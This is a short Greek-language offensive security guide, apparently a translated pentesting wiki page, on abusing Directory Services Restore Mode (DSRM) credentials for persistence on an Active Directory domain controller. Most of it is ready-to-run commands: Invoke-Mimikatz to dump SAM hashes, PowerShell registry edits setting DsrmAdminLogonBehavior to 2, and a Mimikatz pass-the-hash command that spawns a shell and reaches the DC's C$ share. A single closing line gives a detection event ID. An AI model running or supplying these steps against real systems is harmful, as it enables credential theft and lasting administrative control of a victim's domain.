Διαπιστευτήρια DSRM

Υπάρχει ένας τοπικός διαχειριστής λογαριασμός μέσα σε κάθε DC. Έχοντας δικαιώματα διαχειριστή σε αυτήν τη μηχανή, μπορείτε να χρησιμοποιήσετε το mimikatz για να αντλήσετε το hash του τοπικού διαχειριστή. Στη συνέχεια, τροποποιώντας ένα μητρώο για να ενεργοποιήσετε αυτόν τον κωδικό πρόσβασης, μπορείτε να έχετε απομακρυσμένη πρόσβαση σε αυτόν τον τοπικό διαχειριστή χρήστη. Πρώτα πρέπει να αντλήσουμε το hash του τοπικού διαχειριστή χρήστη μέσα στο DC:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Στη συνέχεια, πρέπει να ελέγξουμε εάν αυτός ο λογαριασμός θα λειτουργήσει και εάν το κλειδί του μητρώου έχει την τιμή "0" ή δεν υπάρχει, πρέπει να το ορίσετε σε "2":

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Στη συνέχεια, χρησιμοποιώντας ένα PTH μπορείτε να εμφανίσετε το περιεχόμενο του C$ ή ακόμα και να αποκτήσετε ένα κέλυφος. Παρατηρήστε ότι για τη δημιουργία μιας νέας συνεδρίας powershell με αυτό το hash στη μνήμη (για το PTH) το "domain" που χρησιμοποιείται είναι απλώς το όνομα της μηχανής DC:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Περισσότερες πληροφορίες σχετικά με αυτό μπορείτε να βρείτε στις ακόλουθες διευθύνσεις: https://adsecurity.org/?p=1714 και https://adsecurity.org/?p=1785

Αντιμετώπιση

• Αρ. Συμβάντος 4657 - Ελέγχος δημιουργίας/αλλαγής του HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior